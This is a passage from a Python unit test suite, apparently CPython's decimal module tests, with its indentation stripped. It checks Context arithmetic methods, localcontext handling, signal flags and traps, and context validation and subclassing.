# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
